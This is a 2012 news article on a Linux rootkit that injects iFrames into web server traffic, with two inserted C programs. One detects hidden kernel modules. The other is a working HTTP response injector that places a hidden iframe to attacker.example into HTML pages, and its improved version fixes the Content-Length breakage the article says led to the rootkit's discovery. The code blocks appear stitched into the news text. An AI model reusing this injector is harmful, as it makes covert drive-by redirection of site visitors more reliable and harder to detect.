Security Analysts: Newly Discovered Linux Rootkit Not Sophisticated But Effective

By Ken Presti
November 20, 2012    2:32 PM ET

Researchers are analyzing a new rootkit for 64-bit Linux systems that injects iFrames into the HTTP responses of the web servers it infects, redirecting visitors to malicious sites that install additional malware. It is delivered as a loadable kernel module, hooks the kernel's TCP send path to tamper with outgoing traffic, and manipulates kernel data structures to conceal itself.

At start-up, the module "creates an initial HTTP injection configuration and installs the inline function hook to hijack TCP connection contents," according to Georg Wicherski, senior security researcher at CrowdStrike. Next, it creates a thread that establishes communication with the command-and-control server for use in updating the injection configuration. It then hides the kernel module itself, using direct kernel object manipulation.
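As an added check (this code is not the rootkit's and not from either vendor's analysis), the following userspace program looks for a module hidden the way the paragraph above describes. The common way to hide a module with direct kernel object manipulation is to unlink it from the kernel's module list, which removes it from /proc/modules and therefore from lsmod, while its sysfs directory under /sys/module/ is usually left behind. Whether this particular rootkit also removed its sysfs entry is not stated in the article, so the check rests on that assumption; the sample /proc/modules text and the module name evil_mod are constructed for the demonstration.

```c
/* Added check, not the rootkit's code and not from CrowdStrike or Kaspersky:
 * look for a kernel module hidden by unlinking itself from the module list.
 * A module hidden that way vanishes from /proc/modules (and so from lsmod),
 * but its sysfs directory /sys/module/<name>/ is normally left in place.
 * Whether this rootkit also removed its sysfs entry is not stated in the
 * article, so a clean result here means only that this comparison found
 * nothing. SAMPLE_PROC_MODULES and the module name evil_mod are constructed. */
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#define NAME_LEN 64

/* Two lines in /proc/modules format, and three sysfs names: one is hidden. */
const char SAMPLE_PROC_MODULES[] =
    "ext4 737280 2 - Live 0xffffffffc0b00000\n"
    "snd_hda_intel 57344 0 - Live 0xffffffffc0a80000\n";
char SAMPLE_SYSFS[3][NAME_LEN] = { "ext4", "snd_hda_intel", "evil_mod" };

/* 1 if name is the first field of some line in /proc/modules-format text. */
int in_proc_modules(const char *proc_text, const char *name) {
    size_t n = strlen(name);
    for (const char *line = proc_text; *line; ) {
        if (strncmp(line, name, n) == 0 && (line[n] == ' ' || line[n] == '\n'))
            return 1;
        const char *nl = strchr(line, '\n');
        if (!nl) break;
        line = nl + 1;
    }
    return 0;
}

/* Collect entries of a /sys/module-style directory that carry an initstate
 * file, i.e. loaded modules (built-in code also appears there, for its
 * parameters, but has no initstate). Returns the count, or -1 if unreadable. */
int list_loaded_sysfs_modules(const char *sysdir, char names[][NAME_LEN], int max) {
    DIR *d = opendir(sysdir);
    struct dirent *e;
    int count = 0;
    if (!d) return -1;
    while (count < max && (e = readdir(d)) != NULL) {
        char path[512];
        struct stat st;
        if (e->d_name[0] == '.') continue;
        snprintf(path, sizeof path, "%s/%s/initstate", sysdir, e->d_name);
        if (stat(path, &st) == 0)
            snprintf(names[count++], NAME_LEN, "%s", e->d_name);
    }
    closedir(d);
    return count;
}

/* Names present in sysfs but absent from the module list go into hidden[].
 * Returns how many were found. */
int find_hidden_modules(const char *proc_text, char names[][NAME_LEN], int n,
                        const char *hidden[], int max_hidden) {
    int found = 0;
    for (int i = 0; i < n && found < max_hidden; i++)
        if (!in_proc_modules(proc_text, names[i]))
            hidden[found++] = names[i];
    return found;
}

int main(void) {
    static char proc_text[1 << 16];
    static char names[1024][NAME_LEN];
    const char *hidden[64];
    FILE *f = fopen("/proc/modules", "r");
    size_t got = f ? fread(proc_text, 1, sizeof proc_text - 1, f) : 0;
    int n = list_loaded_sysfs_modules("/sys/module", names, 1024);
    if (f) fclose(f);
    if (!f || n < 0) { perror("reading module lists"); return 1; }
    proc_text[got] = '\0';
    int h = find_hidden_modules(proc_text, names, n, hidden, 64);
    for (int i = 0; i < h; i++)
        printf("in /sys/module but not /proc/modules: %s\n", hidden[i]);
    return h ? 2 : 0;
}
```

Run it as root on the suspect host; any name it prints is loaded according to sysfs but missing from the module list and deserves a look. A rootkit that also deletes its kobject would not show up this way, so a clean run is evidence, not proof.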

"The iFrame injection mechanism is quite interesting: the malware substitutes the system function tcp_sendmsg -- which is responsible for building TCP packets -- with its own function, so the malicious iFrames are injected into the HTTP traffic by direct modification of the outgoing TCP packets," wrote Marta Janus, security researcher with Kaspersky Labs, in her analysis.
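To make the injection mechanism Janus describes concrete, here is an added userspace model (not the rootkit's code, and not from Kaspersky or CrowdStrike) of what a hook on the server's send path must do to an HTTP response buffer. The naive version simply appends the tag; the careful version parses the response, injects only into complete 200 text/html bodies in front of the closing body tag, and rewrites Content-Length to match. The iframe tag, the attacker.example host and the sample responses are constructed for illustration.

```c
/* Added example, not the rootkit's code and not from either analysis quoted in
 * the article: a userspace model of what an injector on the web server's send
 * path (the rootkit hooks tcp_sendmsg) must get right about the HTTP response
 * buffer it is handed. IFRAME, attacker.example and the SAMPLE_* responses are
 * constructed for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

#define IFRAME "<iframe src=\"http://attacker.example/\" width=\"0\" height=\"0\"></iframe>"

const char SAMPLE_HTML[] = "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
    "Content-Length: 50\r\n\r\n<html><body><p>hello from victim</p></body></html>";
const char SAMPLE_JSON[] = "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n"
    "Content-Length: 2\r\n\r\n{}";
/* Headers plus the start of the body: what a hook sees when one page is written across several sends. */
const char SAMPLE_PARTIAL[] = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
    "Content-Length: 50\r\n\r\n<html><body>";

/* Pointer just past the blank line ending the headers, or NULL. */
static const char *find_body(const char *resp) {
    const char *p = strstr(resp, "\r\n\r\n");
    return p ? p + 4 : NULL;
}

/* Case-insensitive header lookup in [resp, body); returns the value or NULL. */
static const char *find_header(const char *resp, const char *name, const char *body) {
    size_t n = strlen(name);
    for (const char *line = resp; line < body; line = strstr(line, "\r\n") + 2) {
        const char *eol = strstr(line, "\r\n");
        if ((size_t)(eol - line) > n && strncasecmp(line, name, n) == 0 && line[n] == ':') {
            const char *v = line + n + 1;
            while (*v == ' ') v++;
            return v;
        }
    }
    return NULL;
}

/* Bounded append into out; -1 on overflow. */
static int put(char *out, size_t outsz, size_t *off, const char *s, size_t n) {
    if (*off + n + 1 > outsz) return -1;
    memcpy(out + *off, s, n);
    *off += n;
    out[*off] = '\0';
    return 0;
}

/* 1 if Content-Length agrees with the bytes after the blank line. */
int content_length_ok(const char *resp) {
    const char *body = find_body(resp);
    const char *clen = body ? find_header(resp, "Content-Length", body) : NULL;
    return clen != NULL && strtoul(clen, NULL, 10) == strlen(body);
}

/* No parsing: tack the tag onto whatever buffer arrives. The headers still
 * advertise the old length, so the client receives a corrupted response. */
int naive_inject(const char *resp, char *out, size_t outsz) {
    size_t off = 0;
    return (put(out, outsz, &off, resp, strlen(resp)) ||
            put(out, outsz, &off, IFRAME, strlen(IFRAME))) ? -1 : 1;
}

/* Inject only into a complete 200 text/html response that has a </body> tag;
 * returns 1 = injected, 0 = not safe to touch this buffer, -1 = out too small. */
static int try_inject(const char *resp, const char *body, char *out, size_t outsz) {
    const char *ctype = find_header(resp, "Content-Type", body);
    const char *clen = find_header(resp, "Content-Length", body);
    const char *close_tag = strstr(body, "</body>");
    size_t body_len = strlen(body), off = 0;
    char lenbuf[64];

    if (strncmp(resp, "HTTP/1.", 7) != 0 || strncmp(resp + 8, " 200", 4) != 0) return 0;
    if (!ctype || strncasecmp(ctype, "text/html", 9) != 0 || !clen || !close_tag) return 0;
    if (find_header(resp, "Transfer-Encoding", body)) return 0;  /* chunked: lengths live per chunk */
    if (strtoul(clen, NULL, 10) != body_len) return 0;           /* body not all in this buffer */

    snprintf(lenbuf, sizeof lenbuf, "Content-Length: %zu", body_len + strlen(IFRAME));
    for (const char *line = resp; line < body - 2; line = strstr(line, "\r\n") + 2) {
        int is_len = strncasecmp(line, "Content-Length:", 15) == 0;  /* the one header we patch */
        size_t n = is_len ? strlen(lenbuf) : (size_t)(strstr(line, "\r\n") - line);
        if (put(out, outsz, &off, is_len ? lenbuf : line, n) || put(out, outsz, &off, "\r\n", 2))
            return -1;
    }
    if (put(out, outsz, &off, "\r\n", 2) || put(out, outsz, &off, body, (size_t)(close_tag - body)) ||
        put(out, outsz, &off, IFRAME, strlen(IFRAME)) || put(out, outsz, &off, close_tag, strlen(close_tag)))
        return -1;
    return 1;
}

/* One send buffer in, one out: inject when safe, otherwise copy through untouched. */
int inject_iframe(const char *resp, char *out, size_t outsz) {
    const char *body = find_body(resp);
    int rc = body ? try_inject(resp, body, out, outsz) : 0;
    size_t off = 0;
    return rc != 0 ? rc : (put(out, outsz, &off, resp, strlen(resp)) ? -1 : 0);
}

int main(void) {
    char out[1024];
    naive_inject(SAMPLE_HTML, out, sizeof out);
    printf("naive: Content-Length consistent? %d\n", content_length_ok(out));
    int rc = inject_iframe(SAMPLE_HTML, out, sizeof out);
    printf("parsed: injected=%d consistent=%d\n%s\n", rc, content_length_ok(out), out);
    return 0;
}
```

The naive path is the kind of mistake Wicherski points to when he cites the lack of proper HTTP response parsing: the advertised Content-Length no longer matches the body, and in a real send hook a page often arrives across several sendmsg calls, so an injector that cannot re-parse has to pass those buffers through untouched, as the careful version does for SAMPLE_PARTIAL. Visible breakage of that kind is what, according to him, led to the rootkit's discovery.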

"In order to obtain the actual injection payload, the malware connects to the C&C server using an encrypted password for authentication," she continued. "We weren't able to connect to the C&C on the port used by malware, but the malicious server is still active and it hosts other *NIX based tools, such as log cleaners."

Once the connection to the command-and-control server is established, the server supplies the injection configuration: the JavaScript or iFrame snippet that the rootkit splices into the web server's outgoing HTTP responses, which in turn sends visitors to sites that deliver further malware.

"The rootkit at hand seems to be the next step in iFrame injecting cybercrime operations, driving traffic to exploit kits," wrote Wicherski of CrowdStrike. "It could also be used in a Waterhole attack to conduct a targeted attack against a specific target audience without leaving much forensic trail."

Wicherski believes this rootkit is not a modification of one that is already publicly available, but he also believes it to be the work of an intermediate-level programmer without extensive kernel experience. He speculates that the attacker is likely to be based in Russia, though he notes that this is based on information that he cannot publicly disclose.

"Although the code quality would be unsatisfying for a serious targeted attack, it is interesting to see the cyber-crime-oriented developers, who have partially shown great skill at developing Windows rootkits, move into the Linux rootkit direction," he said. "The lack of any obfuscation and proper HTTP response parsing, which ultimately also led to discovery of this rootkit, is a further indicator that this is not part of a sophisticated, targeted attack."
